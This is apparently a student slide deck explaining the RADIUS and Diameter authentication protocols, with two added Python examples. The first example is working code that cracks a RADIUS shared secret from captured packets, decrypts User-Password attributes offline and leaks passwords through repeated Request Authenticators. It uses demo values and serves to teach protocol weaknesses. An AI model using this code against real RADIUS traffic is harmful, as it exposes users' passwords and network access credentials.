Diameter and RADIUS

Upload: atul-kumar-srivastava

Post on 04-Apr-2018


  • 7/30/2019 Diameter and Radius

    RADIUS & Diameter Protocol

    Presented By:

    Atul Kumar Srivastava(2017)

    Vishal sangale(2009)

    Prashant Pandey(2004)

    RADIUS - Introduction:

    RADIUS (Remote Authentication Dial In User Service, RFC 2865) is an application-level protocol, carried over UDP, that conveys authentication, authorization and configuration information between a Network Access Server (NAS) and a shared Authentication Server.

    A standardized protocol is required between the access server and the user-information repository in order to exchange authentication-, authorization- and accounting-related information. RADIUS was designed to provide a simple but efficient way to deliver this AAA capability.

    Key features of RADIUS:

    Client/server model

    Network security: transactions between client and server are authenticated with a shared secret that is never sent over the network, and user passwords are hidden in transit

    Flexible authentication mechanisms (PAP, CHAP, EAP and others)

    Extensible protocol: attributes are Type-Length-Value triples, so new attributes can be added without disturbing existing implementations

    Terminology:

    Service

    Session

    Silently discard

    Access-Request

    Access-Accept

    RADIUS Overview:

    [Figure: User -> RADIUS Client (NAS) -> RADIUS Server. The user presents a username and password to the RADIUS client, which forwards them to the RADIUS server in an authentication request; the server returns an authentication acknowledgement.]

    Authentication and Authorization:

    [Figure: the RADIUS client sends an Access-Request frame to the RADIUS server, which answers with Access-Accept, Access-Reject or Access-Challenge.]

    Accounting

    Built-in accounting schemes:

    Unix accounting: accounting data are stored in files and can be viewed with the radwho and radlast commands.

    Detailed accounting: the detailed accounting information is stored in plain-text files, which can be parsed with standard text-processing tools.

    SQL accounting: accounting information is stored in an SQL database and processed with standard SQL queries.

    RADIUS is extensible: further accounting back ends can be added.

    Packet Frame:

    Code (1 octet) - packet type: Access-Request (1), Access-Accept (2), Access-Reject (3), Accounting-Request (4), Accounting-Response (5), Access-Challenge (11)

    Identifier (1 octet) - matches a reply to its request

    Length (2 octets) - total packet length including the 20-octet header; octets beyond Length are ignored, and a packet shorter than Length is silently discarded

    Authenticator (16 octets) - in a request, a random Request Authenticator that also keys the User-Password hiding; in a reply, the Response Authenticator, MD5(Code + ID + Length + RequestAuth + Attributes + Secret), the value used to authenticate the reply from the RADIUS server

    Attributes - the data, as Type(1) Length(1) Value triples

    Client Server Sequence

    The NAS sends the user information in an Access-Request. Only the User-Password attribute is hidden (XORed with MD5(secret + Request Authenticator)); the other attributes, User-Name included, travel in the clear.

    The server answers with an Access-Accept carrying the IP address, network mask, allowed session time, etc.

    The accounting phase starts with an Accounting-Request (Start).

    When the user logs out, the accounting phase ends with the NAS sending an Accounting-Request (Stop) with some additional information (session duration, traffic counters).

    The RADIUS server responds with an Accounting-Response once the accounting information has been stored.

    Limitations

    Response Authenticator Based Shared Secret Attack

    The attacker listens to an Access-Request and the server's response and pre-computes the MD5 state over the known prefix of the Response Authenticator input:

    MD5(Code + ID + Length + ReqAuth + Attributes)

    He then performs an exhaustive (or dictionary) search on the shared secret, appending each candidate to a copy of that saved state and comparing the result with the captured Response Authenticator. The attack is entirely offline; only the entropy of the shared secret protects against it.

    User-Password Attribute Based Shared Secret Attack

    The attacker attempts a connection to the NAS with a password he knows and intercepts the resulting Access-Request. Since User-Password = password XOR MD5(secret + ReqAuth), he can perform an exhaustive search on the shared secret offline by computing MD5(candidate + ReqAuth) and comparing.

    User-Password Based Password Attack

    Having recovered the pad MD5(secret + ReqAuth) for one ReqAuth, the attacker performs an exhaustive or dictionary attack on another user's password by XORing each candidate with that pad and sending it in the User-Password attribute of an Access-Request that reuses the same ReqAuth.

    Possible because the Access-Request packet is not authenticated at all. (The Message-Authenticator attribute of RFC 2869, an HMAC-MD5 over the packet, closes this hole when the server requires it.)

    Limitations Continued

    Shared Secret Hygiene

    Many deployments use one shared secret for every NAS, so the server effectively views them all as a single client; compromising one device exposes all of them.

    Small key size (short, human-chosen secrets) makes the exhaustive searches above cheap.

    Request Authenticator Based Attacks

    Passive User-Password Compromise through Repeated Request Authenticators: if a NAS repeats a Request Authenticator, both requests use the same pad MD5(secret + ReqAuth), so XORing the two User-Password attributes yields the XOR of the two passwords.

    Active User-Password Compromise through Repeated Request Authenticators: the attacker builds a dictionary of ReqAuth -> pad as before. When he predicts he can cause the NAS to use a certain ReqAuth, he connects with a known password and intercepts the Access-Request; the recovered pad then reveals any other user's password hidden under that ReqAuth.

    Replay of Server Responses through Repeated Request Authenticators: the attacker builds a dictionary of ReqAuth, ID and the entire server response. When a ReqAuth and ID repeat, he replays the stored response to the NAS; most server responses will be Access-Accept.
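As an added example (not from the slides), the following Python builds the RADIUS frames from the Packet Frame and Client Server Sequence slides and then carries out the shared-secret attacks listed under Limitations: the Response Authenticator dictionary attack with a pre-computed MD5 state, offline User-Password decryption once the secret is known, and the XOR leak caused by a repeated Request Authenticator. Encoding follows RFC 2865; the shared secret, user names, passwords and the fixed Request Authenticator are constructed test data, and hashlib's copy() plays the role of the saved MD5 state.

```python
# Added example, not part of the slides: RFC 2865 packet handling and the shared-secret
# attacks listed above. Secret, users, passwords and the Request Authenticator are
# constructed test data; a real NAS must draw the Request Authenticator at random.
import hashlib
import struct

ACCESS_REQUEST, ACCESS_ACCEPT = 1, 2
ATTR_USER_NAME, ATTR_USER_PASSWORD = 1, 2

def encode_attrs(attrs):
    """Type(1) Length(1) Value TLVs; Length counts its own 2 octets, so values are <= 253 octets."""
    out = b""
    for t, v in attrs:
        if len(v) > 253:
            raise ValueError("attribute value exceeds 253 octets")
        out += struct.pack("!BB", t, len(v) + 2) + v
    return out

def find_attr(packet, wanted):
    """Walk the attributes after the 20-octet header; return the first value of type `wanted`."""
    pos = 20
    while pos + 2 <= len(packet):
        t, l = packet[pos], packet[pos + 1]
        if l < 2 or pos + l > len(packet):
            return None  # malformed: a RADIUS receiver silently discards such a packet
        if t == wanted:
            return packet[pos + 2:pos + l]
        pos += l
    return None

def xor16(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def hide_password(password, secret, req_auth):
    """RFC 2865 5.2: pad to 16n octets; block i = plaintext XOR MD5(secret + previous ciphertext block), block 0 using the ReqAuth."""
    padded = password + b"\x00" * (-len(password) % 16) or b"\x00" * 16
    out, prev = b"", req_auth
    for i in range(0, len(padded), 16):
        block = xor16(padded[i:i + 16], hashlib.md5(secret + prev).digest())
        out, prev = out + block, block
    return out

def reveal_password(cipher, secret, req_auth):
    """Inverse of hide_password; the chain runs on ciphertext, so one pass suffices."""
    out, prev = b"", req_auth
    for i in range(0, len(cipher), 16):
        out += xor16(cipher[i:i + 16], hashlib.md5(secret + prev).digest())
        prev = cipher[i:i + 16]
    return out.rstrip(b"\x00")

def build_packet(code, ident, authenticator, attrs):
    """Code(1) Identifier(1) Length(2) Authenticator(16) Attributes."""
    body = encode_attrs(attrs)
    return struct.pack("!BBH", code, ident, 20 + len(body)) + authenticator + body

def build_request(ident, req_auth, user, password, secret):
    return build_packet(ACCESS_REQUEST, ident, req_auth, [
        (ATTR_USER_NAME, user),
        (ATTR_USER_PASSWORD, hide_password(password, secret, req_auth))])

def build_accept(ident, req_auth, secret, attrs=()):
    """Response Authenticator = MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    body = encode_attrs(list(attrs))
    head = struct.pack("!BBH", ACCESS_ACCEPT, ident, 20 + len(body))
    return head + hashlib.md5(head + req_auth + body + secret).digest() + body

def crack_secret(request, response, wordlist):
    """Response Authenticator attack: everything hashed before the secret was on the wire,
    so absorb it once and feed only each candidate secret into a copy of that MD5 state."""
    prefix = hashlib.md5(response[:4] + request[4:20] + response[20:])
    for cand in wordlist:
        h = prefix.copy()
        h.update(cand)
        if h.digest() == response[4:20]:
            return cand
    return None

def recover_password(request, secret):
    """With the secret known, every captured User-Password attribute decrypts offline."""
    return reveal_password(find_attr(request, ATTR_USER_PASSWORD), secret, request[4:20])

def xor_leak(victim_request, attacker_request, attacker_password):
    """Repeated Request Authenticator: same secret and ReqAuth give the same pad, so
    C1 XOR C2 = P1 XOR P2 and the attacker's own password P2 exposes P1 without the secret.
    Shown for the first 16-octet block, whose pad does not depend on earlier ciphertext."""
    c1 = find_attr(victim_request, ATTR_USER_PASSWORD)[:16]
    c2 = find_attr(attacker_request, ATTR_USER_PASSWORD)[:16]
    return xor16(xor16(c1, c2), attacker_password.ljust(16, b"\x00")[:16]).rstrip(b"\x00")

if __name__ == "__main__":
    secret, req_auth = b"s3cret", bytes(range(16))  # constructed demo values
    req = build_request(7, req_auth, b"alice", b"hunter2", secret)
    resp = build_accept(7, req_auth, secret)
    print("secret:", crack_secret(req, resp, [b"radius", b"s3cret"]))
    print("password:", recover_password(req, secret))
    req2 = build_request(8, req_auth, b"mallory", b"attackerpw", secret)
    print("leaked via repeated ReqAuth:", xor_leak(req, req2, b"attackerpw"))
```

Nothing in crack_secret depends on the secret's length or format, which is why the summary's advice (a random secret of at least 16 octets, distinct per client) is the only real mitigation at the RADIUS layer; the pre-computed prefix means each candidate costs a single MD5 compression over the secret alone.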

    Diameter - Introduction

    The Diameter protocol (RFC 3588, revised as RFC 6733) was derived from RADIUS with many improvements in different aspects, and is generally regarded as the next-generation Authentication, Authorization and Accounting (AAA) protocol.

    Diameter is widely used in the IMS architecture for IMS entities to exchange AAA-related information.

    Diameter nodes and agents

    Diameter is designed as a peer-to-peer architecture: every host that implements the Diameter protocol can act as either a client or a server, depending on the network deployment.

    THREE TYPES OF DIAMETER AGENTS

    Relay Agent

    A Relay Agent forwards a message to the appropriate destination, depending on the routing information contained in the message (e.g. Destination-Realm). It inserts or removes routing information but does not otherwise modify the message.

    Proxy Agent

    A Proxy Agent can also forward messages, but unlike a Relay Agent, a Proxy Agent can modify the message content and therefore provide value-added services, enforce rules on different messages, or perform administrative tasks for a specific realm.

    Redirect Agent

    A Redirect Agent acts as a centralized configuration repository for other Diameter nodes. When it receives a message, it checks its routing table and returns a response message with redirection information to the original sender, which then contacts the indicated peer directly.

    Special agent

    Translation Agent

    In addition to these agents, there is a special agent called a Translation Agent. Its responsibility, as you might have guessed, is to convert a message from one AAA protocol to another, for example RADIUS to Diameter so that legacy NASes can reach a Diameter server.


    Diameter packet format


    Comparison of Diameter and RADIUS protocols

    Feature                       Diameter                                      RADIUS
    Transport protocol            Connection-oriented (TCP and SCTP)            Connectionless (UDP)
    Security                      Hop-to-hop, end-to-end                        Hop-to-hop
    Agent support                 Relay, Proxy, Redirect, Translation           Implicit: agent behaviours may be
                                                                                implemented inside a RADIUS server
    Capabilities negotiation      Negotiates supported applications and         Not supported
                                  security level
    Peer discovery                Static configuration and dynamic lookup       Static configuration
    Server-initiated messages     Supported, e.g. re-authentication and         Not supported
                                  session termination
    Maximum attribute data size   16,777,215 octets (24-bit AVP Length)         255 octets (8-bit Length)
    Vendor-specific support       Vendor-specific messages and AVPs             Vendor-specific attributes only

    Notes: in Diameter the hop-to-hop protection is TLS/DTLS or IPsec (RFC 6733); the end-to-end security framework referenced by RFC 3588 was never completed and is absent from RFC 6733, so in deployed networks Diameter security is hop-by-hop as well. Both length figures include the attribute header (8 or 12 octets for a Diameter AVP, 2 octets for a RADIUS attribute, leaving 253 octets of data). RADIUS later gained a limited form of server-initiated messaging through the Disconnect and Change-of-Authorization messages of RFC 5176.
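As an added example (not part of the slides), the following Python encodes and parses a Diameter message using the header and AVP layout of RFC 6733, which the packet format slide above left as an image; it shows the 24-bit AVP Length and the Vendor-ID field behind vendor-specific AVPs from the comparison table, and rejects length fields that would walk a parser off the buffer. The Origin-Host value, the vendor id and the vendor AVP code are constructed for the demo.

```python
# Added example, not part of the slides: encode and parse a Diameter message per RFC 6733.
# Header: Version(1) Length(3) Flags(1) Command-Code(3) Application-ID(4) Hop-by-Hop(4) End-to-End(4)
# AVP:    Code(4) Flags(1) Length(3) [Vendor-ID(4) when the V flag is set] Data, padded to 32 bits
import struct

REQUEST_FLAG, VENDOR_FLAG, MANDATORY_FLAG = 0x80, 0x80, 0x40
CMD_CAPABILITIES_EXCHANGE = 257   # CER/CEA command code
AVP_ORIGIN_HOST = 264

def build_avp(code, data, mandatory=True, vendor_id=None):
    """AVP Length counts header and data but not the padding octets."""
    flags, vendor = (MANDATORY_FLAG if mandatory else 0), b""
    if vendor_id is not None:
        flags |= VENDOR_FLAG
        vendor = struct.pack("!I", vendor_id)
    length = 8 + len(vendor) + len(data)
    if length > 0xFFFFFF:
        raise ValueError("AVP exceeds the 24-bit Length field")
    return struct.pack("!IB", code, flags) + length.to_bytes(3, "big") + vendor + data + b"\x00" * (-length % 4)

def build_message(command_code, flags, app_id, hop_by_hop, end_to_end, avps):
    body = b"".join(avps)
    return (bytes([1]) + (20 + len(body)).to_bytes(3, "big") + bytes([flags])
            + command_code.to_bytes(3, "big") + struct.pack("!III", app_id, hop_by_hop, end_to_end) + body)

def parse_message(data):
    """Parse header and AVPs, rejecting any length field that would walk off the buffer."""
    if len(data) < 20 or data[0] != 1:
        raise ValueError("truncated header or unsupported version")
    length = int.from_bytes(data[1:4], "big")
    if length != len(data) or length % 4:
        raise ValueError("Message Length does not match buffer or is not 32-bit aligned")
    flags, command_code = data[4], int.from_bytes(data[5:8], "big")
    app_id, hop_by_hop, end_to_end = struct.unpack("!III", data[8:20])
    avps, pos = [], 20
    while pos < length:
        if pos + 8 > length:
            raise ValueError("truncated AVP header")
        code, aflags = struct.unpack("!IB", data[pos:pos + 5])
        avp_len = int.from_bytes(data[pos + 5:pos + 8], "big")
        hdr = 12 if aflags & VENDOR_FLAG else 8
        if avp_len < hdr or pos + avp_len > length:
            raise ValueError("AVP Length out of bounds")
        vendor_id = struct.unpack("!I", data[pos + 8:pos + 12])[0] if hdr == 12 else None
        avps.append({"code": code, "mandatory": bool(aflags & MANDATORY_FLAG),
                     "vendor_id": vendor_id, "data": data[pos + hdr:pos + avp_len]})
        pos += avp_len + (-avp_len % 4)     # skip the padding the Length field excludes
    return {"request": bool(flags & REQUEST_FLAG), "command_code": command_code,
            "application_id": app_id, "hop_by_hop": hop_by_hop, "end_to_end": end_to_end, "avps": avps}

def sample_cer():
    """Constructed CER: an Origin-Host AVP and one vendor-specific AVP (vendor id and code chosen for the demo)."""
    return build_message(CMD_CAPABILITIES_EXCHANGE, REQUEST_FLAG, 0, 0x1000, 0x2000, [
        build_avp(AVP_ORIGIN_HOST, b"nas.example.net"),
        build_avp(1, b"\x01\x02\x03", vendor_id=10415)])

if __name__ == "__main__":
    parsed = parse_message(sample_cer())
    print(parsed["command_code"], parsed["request"],
          [(a["code"], a["vendor_id"], a["data"]) for a in parsed["avps"]])
```

The two bounds checks in parse_message are the ones that matter on a Diameter agent exposed to untrusted peers: the AVP Length is attacker-controlled and, unlike the RADIUS one-octet length, can claim up to 16 MiB, so every AVP is checked against the message length before its data is sliced out.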

    Summary

    RADIUS is a remote authentication protocol.

    RADIUS is the de facto standard for remote authentication.

    RADIUS is an extensible protocol and can support many authentication methods (e.g. EAP).

    RADIUS has several weaknesses:

    Use of an ad hoc MD5-based stream cipher to hide the User-Password attribute

    The Access-Request transaction is not authenticated at all (unless the Message-Authenticator attribute is present and required)

    The RADIUS specification should require each client to use a different shared secret.

    It should also require the shared secret to be a random bit string at least 16 octets long, generated by a cryptographically secure PRNG.

    Diameter was brought in to replace RADIUS and fix some of these flaws:

    Uses reliable transport (TCP or SCTP)

    Better transport-level security using IPsec or TLS/DTLS

    Cont..

    In addition to SIP, Diameter is the other core protocol used in the IP Multimedia Subsystem (IMS) architecture, both in the service plane and the control plane. IMS defines a set of reference points between different IMS entities, and some of them use Diameter as the underlying protocol to exchange subscription-, presence- and billing-related messages. For example, the Sh reference point in IMS defines a set of Diameter messages for subscription and notification purposes.